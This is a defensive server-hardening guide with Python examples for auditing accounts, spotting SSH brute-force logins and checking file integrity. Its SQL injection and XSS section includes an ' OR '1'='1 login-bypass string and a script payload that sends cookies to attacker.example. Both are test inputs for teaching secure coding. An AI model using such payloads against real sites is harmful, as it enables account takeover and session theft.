Installing a server is something a lot of people undertake today. Whether you're a student, an administrator or an IT professional, it is very likely that one day or another you'll need to install a server that will be exposed to the Internet.
There are many types of servers, from web servers to mail servers to forums, and each of them requires some planning before it is deployed on the Internet. Without the necessary precautions, an exposed server can become the intruder's way into your internal network. So what can one do to ensure a server is as safe as possible?
The first layer of a server is the hardware
- Keep in mind where this server is going to be stored, who will have access to it, and what its network pipe looks like. If you're a small company and everyone, including the email server, is on the same network segment, someone on that segment could run a network sniffer and capture everyone's email (anything carried over unencrypted protocols such as plain POP3, IMAP or SMTP is readable as it passes). Keep this in mind when deciding how to wire your network: Internet-facing servers belong on their own segment, separated from the workstations.
- Another consideration is physical security. Attacks do not exclusively originate from the outside. A disgruntled employee with physical access to the server (even without login credentials) can boot it from removable media or pull its disks, and could install a Trojan that steals valuable data such as the credit card details handled by the company's online ordering system. Keep servers in a locked room or cabinet and restrict who holds the keys.
The second layer of a server is the operating system. Be it a Windows-based server or a Linux-based server the underlying steps are the same.
- When installing the operating system ensure you only install components that you will need. Do not install an FTP server if you don’t intend to use it.
- Ensure every service runs under its own dedicated account, and make sure none of these accounts has administrative (root) rights. If a service running with administrator rights is compromised, the attacker inherits total control of the system; if it runs as an unprivileged user, the damage is confined to what that account can reach.
- Double-check the server's user list. Remove or disable accounts that are not needed (default, guest and test accounts included), make sure every active account has a strong password that follows best practices, and lock service accounts so they cannot be used for interactive logins.
- Make sure the server is fully patched before it is connected to the Internet. A server exposed while it is still being set up can be compromised before you have finished hardening it.
- Plan how you will monitor the server once it goes live: which logs you will watch, how you will be alerted, and who will respond.
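The user-list check above is easy to do badly by eye. The following is an added example (not code from the original article) that audits passwd and shadow style records for the problems the list warns about: a second UID 0 account, a service account with an interactive shell, and an account with an empty password field. The records are constructed sample data; on a real server you would read /etc/passwd and /etc/shadow themselves (the latter needs root). Treating UIDs 1-999 as the system range is an assumption that matches Debian and Red Hat defaults.

```python
"""Local account audit: added example code, not part of the original article.
Sample passwd/shadow records below are constructed; read the real files on a
server. The system UID range (1-999) is an assumption (Debian/Red Hat defaults)."""
from typing import Dict, List

# Constructed sample data with three deliberate problems: a second UID 0
# account (toor), a service account with an interactive shell (www-data),
# and an account with an empty password field (test).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
postfix:x:106:112::/var/spool/postfix:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
toor:x:0:0:spare admin:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
test:x:1001:1001:temporary test user:/home/test:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$salt$hash1:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
postfix:*:19000:0:99999:7:::
backup:*:19000:0:99999:7:::
toor:$6$salt$hash2:19000:0:99999:7:::
alice:$6$salt$hash3:19000:0:99999:7:::
test::19000:0:99999:7:::
"""

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash",
                      "/usr/bin/bash", "/usr/bin/zsh"}
SYSTEM_UID_MAX = 999  # assumption: system accounts use UIDs 1-999


def parse_colon_file(text: str) -> List[List[str]]:
    """Split passwd/shadow style text into field lists, skipping blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def audit_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    """Return one 'account: problem' string per finding."""
    findings: List[str] = []
    shadow: Dict[str, str] = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    for fields in parse_colon_file(passwd_text):
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        hashed = shadow.get(name)
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 account other than root")
        if hashed is None:
            findings.append(f"{name}: no shadow entry")
        elif hashed == "":
            findings.append(f"{name}: empty password field (logs in without a password)")
        # Service accounts should be locked to a nologin/false shell.
        if 0 < uid <= SYSTEM_UID_MAX and shell in INTERACTIVE_SHELLS:
            findings.append(f"{name}: system account with interactive shell {shell}")
    return findings


def interactive_logins(passwd_text: str, shadow_text: str) -> List[str]:
    """Accounts that can actually log in interactively: an interactive shell and
    a password field that is neither locked ('!' or '*' prefix) nor missing.
    Every name on this list should be someone you can account for."""
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    names: List[str] = []
    for fields in parse_colon_file(passwd_text):
        name, shell = fields[0], fields[6]
        hashed = shadow.get(name)
        locked = hashed is None or hashed.startswith(("!", "*"))
        if shell in INTERACTIVE_SHELLS and not locked:
            names.append(name)
    return names


if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print("FINDING", finding)
    print("can log in:", ", ".join(interactive_logins(SAMPLE_PASSWD, SAMPLE_SHADOW)))
```

Note that the empty-password account shows up twice, as a finding and on the list of accounts that can log in, which is the point: an empty hash field is not a locked account, it is one that accepts an empty password.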
The final layer of our new server will be the software running on it and its corresponding configuration.
- Ensure the server is configured securely. Plenty of guides describe how to securely configure nearly any type of server imaginable (the vendor's own hardening documentation is a good place to start), and it is good practice to follow one.
- Once a server is installed securely, the administrator's responsibility doesn't end there. You need to be mindful of what it is running and what might be installed in the future. This is especially true for web servers: a single insecure script can leave an otherwise hardened server as exposed as a badly configured one, so it is essential that the administrator keeps a watchful eye on what gets deployed on the server later on.
- Make sure the server does not advertise to the world what software it is running and which versions. Many servers display this information by default in a banner or header when a client opens a connection (for web servers, Apache's ServerTokens and ServerSignature directives and nginx's server_tokens setting control this). This is valuable information to an attacker scanning for particular versions of software for which he has exploits. Hiding the banner only slows an attacker down, though; it is no substitute for patching.
- Ensure that third-party add-ons (modules, plugins, extensions) are securely configured as well, and remove those you do not use.
- Test any content you put on your servers. This is especially true for web servers. Even if you install a third-party web application that you paid a lot of money for, it is essential to test that application for the usual attacks such as cross-site scripting and SQL injection before it goes live.
- Regularly review the logs of your software to confirm it is running as expected and has not been compromised.
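To make the last two kinds of test concrete, here is an added example (not code from the original article) showing an SQL injection flaw and a cross-site scripting flaw next to their fixed forms. It uses an in-memory SQLite table with constructed rows; the password_hash column stands in for whatever credential store a real application uses, and the payloads are the classic probes you would put into every form field and URL parameter of an application under test.

```python
"""SQL injection and XSS, vulnerable form beside the safe form. Added example
code, not part of the original article. Data rows and payloads are constructed."""
import html
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-of-alices-password"),
                      ("bob", "hash-of-bobs-password")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password_hash: str) -> Optional[str]:
    """Builds the statement by string concatenation, so a quote in the input
    ends the literal and the rest of the input is executed as SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password_hash = '" + password_hash + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str,
               password_hash: str) -> Optional[str]:
    """Parameterised statement: the driver binds the values as data, so they
    can never change the structure of the query."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash)).fetchone()
    return row[0] if row else None


def render_comment_vulnerable(comment: str) -> str:
    """Echoes user content straight into the page: stored/reflected XSS."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser shows text instead of running it."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


# Constructed test payloads.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
               "+document.cookie</script>")

if __name__ == "__main__":
    db = make_db()
    # The injected password turns the WHERE clause into
    #   username = 'nobody' AND password_hash = '' OR '1'='1'
    # which is true for every row, so the first user is "logged in".
    print("vulnerable login as:", login_vulnerable(db, "nobody", SQLI_PAYLOAD))
    print("safe login as:", login_safe(db, "nobody", SQLI_PAYLOAD))
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

If a bought-in application accepts the first payload, or reflects the second one unescaped, it is not ready for the Internet no matter what it cost.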
For new administrators, or anyone installing a server for the first time, the biggest threat is perhaps fear. It is understandable that the first goal of anyone installing a server is to get it working. At times this takes a fair amount of work to get just right, and once that goal is achieved the temptation to leave the newly set up server alone can be great. Do not allow the fear of possibly breaking the new server to stop you from properly securing it.
If possible, keep a test server with an identical setup available at all times, so that whenever patches to the system or software are released they can be tested properly there before being deployed on the live system. This helps avoid downtime in case a patch causes issues with your particular setup.
Actively monitor your server. A server directly connected to the Internet is guaranteed to receive automated scans and attack attempts daily. If any of these succeed, it is important to find out as early as possible and take corrective action before the hacker is able to compromise the system any further.
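Reviewing logs and active monitoring come down to knowing what a compromise looks like in the data you already collect. As an added example (not code from the original article), the following runs a simple detection over SSH authentication log lines: it flags a source address that accumulates a burst of failed logins, and, more importantly, a successful login from a source that was just brute-forcing. The log lines are constructed in the syslog format sshd writes on Debian and Ubuntu (that format carries no year, so one is assumed), and the threshold of five failures within one minute is an assumption to tune for your own server.

```python
"""Failed-login burst detection over sshd log lines: added example code, not
part of the original article. Log lines are constructed; year, threshold and
window are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Constructed sample: a password-guessing run from 203.0.113.45 that ends in
# a successful root login, a user mistyping once then logging in with a key,
# and a slow trickle from 192.0.2.9 that stays under the threshold.
SAMPLE_LOG = """\
Mar 10 02:14:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.45 port 52110 ssh2
Mar 10 02:14:03 web1 sshd[2103]: Failed password for invalid user oracle from 203.0.113.45 port 52114 ssh2
Mar 10 02:14:05 web1 sshd[2105]: Failed password for root from 203.0.113.45 port 52118 ssh2
Mar 10 02:14:07 web1 sshd[2107]: Failed password for root from 203.0.113.45 port 52120 ssh2
Mar 10 02:14:09 web1 sshd[2109]: Failed password for root from 203.0.113.45 port 52122 ssh2
Mar 10 02:14:12 web1 sshd[2111]: Accepted password for root from 203.0.113.45 port 52126 ssh2
Mar 10 02:20:44 web1 sshd[2140]: Failed password for alice from 198.51.100.7 port 40012 ssh2
Mar 10 02:20:51 web1 sshd[2142]: Accepted publickey for alice from 198.51.100.7 port 40014 ssh2
Mar 10 09:01:00 web1 sshd[2500]: Failed password for root from 192.0.2.9 port 33001 ssh2
Mar 10 09:02:00 web1 sshd[2502]: Failed password for root from 192.0.2.9 port 33002 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) (\w+) for (?:invalid user )?(\S+) from (\S+) port \d+")


def parse_events(text: str, year: int = 2024) -> List[Dict]:
    """Turn matching sshd lines into dicts; other sshd messages are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, outcome, method, user, src = m.groups()
        events.append({"time": datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S"),
                       "outcome": outcome, "method": method, "user": user, "src": src})
    return events


def detect(events: List[Dict], threshold: int = 5,
           window: timedelta = timedelta(minutes=1)) -> List[Tuple[str, str, str, datetime]]:
    """Return (kind, source_ip, user, time) alerts.

    'brute-force': a source reached `threshold` failures within `window`
    (reported once per source). 'success-after-brute-force': a login from that
    source was accepted while its failure count was still at or above the
    threshold; this is the one to act on immediately."""
    alerts: List[Tuple[str, str, str, datetime]] = []
    recent_failures: Dict[str, List[datetime]] = defaultdict(list)
    already_reported: Set[str] = set()
    for ev in events:
        fails = recent_failures[ev["src"]]
        while fails and ev["time"] - fails[0] > window:   # slide the window
            fails.pop(0)
        if ev["outcome"] == "Failed":
            fails.append(ev["time"])
            if len(fails) >= threshold and ev["src"] not in already_reported:
                already_reported.add(ev["src"])
                alerts.append(("brute-force", ev["src"], ev["user"], ev["time"]))
        elif len(fails) >= threshold:
            alerts.append(("success-after-brute-force", ev["src"], ev["user"], ev["time"]))
    return alerts


if __name__ == "__main__":
    for kind, src, user, when in detect(parse_events(SAMPLE_LOG)):
        print(f"{when:%b %d %H:%M:%S} {kind:26} {src:16} user={user}")
```

The interesting output is the second alert: five failures followed by an accepted root password within eleven seconds from the same address is exactly the pattern you want to be woken up for, while the slow trickle from 192.0.2.9 is background noise that every Internet-facing server sees.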
Keep periodic backups of your server (a full backup plus regular incrementals), store them where the server itself cannot overwrite or delete them, and test that you can actually restore from them. Backups are essential because they let you recover quickly from hardware failure and from intrusions alike.
If your server suffers an intrusion, the best approach is to disconnect it, preserve a copy of the compromised system (a disk image) for investigation, work out how the intruder gained access, rebuild from clean installation media or restore a backup that predates the intrusion (do not trust the compromised system: the intruder could have installed software and replaced system tools to make it easy to compromise again, and a backup taken after the break-in will carry those changes with it), and close the hole the intruder used before reconnecting the system to the Internet.
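The reason not to trust a compromised system is that you cannot tell by looking which tools have been replaced. A file-integrity baseline taken while the server is known good answers that question later. The following is an added example (not code from the original article) of such a baseline: it hashes every regular file under a directory and reports what was added, removed or modified since. The demo builds a throwaway directory standing in for /bin with constructed file contents, so it runs anywhere; on a real server you would point it at the directories holding system binaries and configuration.

```python
"""File-integrity baseline for spotting replaced system tools: added example
code, not part of the original article. The demo directory and its file
contents are constructed stand-ins for real binaries."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root) -> Dict[str, str]:
    """Relative path -> SHA-256 for every regular file under root. Symlinks are
    skipped so a link pointed at an intruder's file is not hashed as the original."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file() and not p.is_symlink()}


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Difference between a known-good baseline and the current state."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a fake /bin, then simulate an intruder."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp, "bin")
        bin_dir.mkdir()
        (bin_dir / "ls").write_bytes(b"constructed stand-in for the ls binary")
        (bin_dir / "ps").write_bytes(b"constructed stand-in for the ps binary")
        baseline = build_baseline(tmp)  # taken while the system is known good
        # Simulated intrusion: a trojaned ps, a dropped backdoor, a deleted tool.
        (bin_dir / "ps").write_bytes(b"trojaned ps that hides the intruder's processes")
        (bin_dir / ".backdoor").write_bytes(b"constructed reverse-shell payload")
        (bin_dir / "ls").unlink()
        return compare(baseline, build_baseline(tmp))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9}", ", ".join(paths) or "-")
```

Two caveats that follow from the article's own advice: keep the baseline off the server (an intruder with root can simply regenerate it), and run the comparison from a trusted boot medium rather than on the live system, because a rootkit can make the compromised kernel and tools lie about what is on disk. Tools such as AIDE and Tripwire implement this same idea with more options.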